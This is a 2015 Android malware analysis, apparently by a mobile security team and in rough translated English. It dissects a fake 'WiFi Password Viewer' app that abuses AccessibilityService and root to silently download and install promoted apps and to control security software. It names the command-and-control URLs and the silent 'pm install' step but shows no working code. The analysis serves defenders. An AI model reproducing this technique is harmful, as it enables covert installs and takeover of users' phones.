Ali Mobile Security · 2015/12/18 16:55
Author:[email protected]
0x00 Malicious Application Overview
In recent years, many Android market to achieve root free installation applications, that is, download complete immediately automatic installation, and the black industry is also using the technology in malicious promotion, silent installation. Recently intercepted a large number of malicious applications using AccessibilityService silent installation applications. Once the malicious Accessibility service is activated, the malicious application will pop up ads. Even if the user closes the pop-up ads, the application will be downloaded in the background, and then the promoted malicious application will be automatically installed.
0x01 AccessibilityService
AccessibilityService role:
Android Accessibility is accessible to those users who cannot easily use Android smartphones due to vision, hearing, or other physical problems. Android Accessibility provides Accessibility features and services to help these users operate their devices more easily. Developers can build their own Accessibility services to enhance the usability of their applications. After the AccessibilityService is enabled, the application can obtain the window element information of the current operation application in real time, and can be two-way interaction, not only can obtain user input, but also can operate on the window element, such as clicking a button.
AccessibilityService
The Android App market uses Android Accessibility to avoid root installation. Red envelope snatching apps are also using AccessibilityService to automatically grab red envelopes.
0x02 Malicious Application Analysis
We detected an app called “WiFi Password Viewer (Enhanced)” abusing AccessibilityService. After the application starts, the user is induced to open the “WIFI signal enhancement service”, which is actually to open the AccessibilityService of the malicious application itself. To view the WIFI password for the malicious application to gain root permission, and all this is the malicious automatic installation of the groundwork. Below is an application diagram
When the app starts, it guides the user to enable WIFI signal enhancement. The ACCESSIBILITY_SETTINGS screen prompts the user to enable the Wifi signal enhancement service to enhance Wifi signal strength. After the malicious application service is enabled, the mobile phone frantically downloads the application package prepared by the cloud of the application and automatically installs and runs it on the mobile phone.
The following is the flow of malicious code
Flow chart analysis
- Wifi_list module, malicious applications use WIFI signal enhancement to induce users to open
Accessiblity Service; View the Wifi password to induce the user to grant Root permission to the application. - PushDownLoad module, which is provided by
PushCoreServiceandChapingCoreServiceService composition, they use background services to upload device information, obtain application packages to be pushed, download application packages. - Install modules, malicious applications parse downloaded successful packages, and then pop up
DialogPushActivityAD box, non-root utilizationAccessilbityServiceInstall, root usepm installComplete silent Installation - Daemon module. Daemon is an ELF file stored in the raw directory. It is a daemon process that protects applications from being killed. A child process is forked out to become the lead process of a new session and is separated from its parent’s session group and process group. This is followed by the periodic initiation of Java configuration tasks in the child process. Here it guarantees
PushCoreServiceandChapingCoreServiceIt’s been running in the background.
The following traces the core service PushCoreService
First Post to the target server equipment imei, wifimac, SerialNumber information, the server returns uuid, and record in “uuid DefaultSharedPreference file” field
Above the last call this. M_context. Handler. SendEmptyMessage (1), start the thread GetPushThread thread. This thread to http://api.findzhibo.com/ad/open?appCode=1&appVersion=appVerion request for current “open_status” fields of application. The cloud server continues to run only when the open_status field is True. Otherwise, the cloud server of the current application version is shut down. Open to http://api.findzhibo.com/index.php/ad/push, send a post request, the server returns to push the application of the write “cc_push_sp. XML” push_json fields
Above the last call this. M_context. Handler. SendEmptyMessage (2), analytic push_json field filling intent, start-up PushDownloadService application download and malicious pop-up ads page. PushDownloadService parses appJson to obtain the download information, and then downloads and installs the application using handler messages.
The Handler has 4 msg.what values, ‘3’ processing download failure; ‘4’ downloaded successfully; If the Accessiblity Service is enabled, the WifiZengQiangService is started. “6” Displays the DialogPushActivity advertisement box to start the maliciously promoted application. First send “4” to start the background download, and then start the download and installation thread. The thread checks whether the application pushed this time has been downloaded to the specified directory. Sdcard /.wifi_ckq saves the downloaded application package and advertising pictures, and appName is encrypted by MD5.
After the download is complete, send the silent installation of the application. If the device is not root, send ‘5’. Root uses PM install to install the application and then send ‘6’ to start the application.
Handler ‘5’ and ‘6’ both start DialogPushActivity,
DialogPushActivity is essentially an ImageView that will automatically install apps pushed by the user when the user touches it
Start the WifiZengQiongService automatic installation service. The Ghosh Push,Kemoge and other virus families, all first root devices and then embedded promotion applications. Once the malicious app’s AccessibilityService is activated, the malicious AD screen is displayed. Even if the victim closes the pop-up AD, the app is automatically downloaded and then successfully installed. This process is to call the system’s PackageInstaller to obtain the button location of the installation interface. The simulated user click function provided by Accessibility replaces the user’s automatic click next until the installation is completed. Below is a pop-up AD that you can touch to start downloading and installing the promoted app. The installation interface is evoked in the Following image of AccessibilityService
AccessibilityService onAccessibilityEvent method not only deal with ‘com. Android. Packageinstaller’ event, also with some security software, so that the malicious applications will be completely control the security software behavior, This means that the app can automatically install, start, uninstall any app, and use AccessibilityService to control the security software without killing.
In promoting the application of after successful installation, the system will send out the “android. Intent. Action. PACKAGE_ADDED” broadcast news, AppListenerReceiver class to accept the radio and start the application.
0x03 Summary and Suggestions
To this abuse of AccessibilityService process analysis is completed. The app has enhanced the WIFI signal to entice users to enable Accessibility, and check the WIFI password for the app to obtain root access. Please be careful to enable AccessibilityService for untrusted applications to avoid being controlled by malicious applications. Recently, the popular red envelope snatchapps will also use AccessibilityService to realize the automatic snatchfunction. We have found that hackers use “automatic red envelope snatchService” to induce users to open AccessibilityService to control their mobile phones. It is suggested that users download the red envelope snatchsoftware in safe channels to avoid unnecessary losses.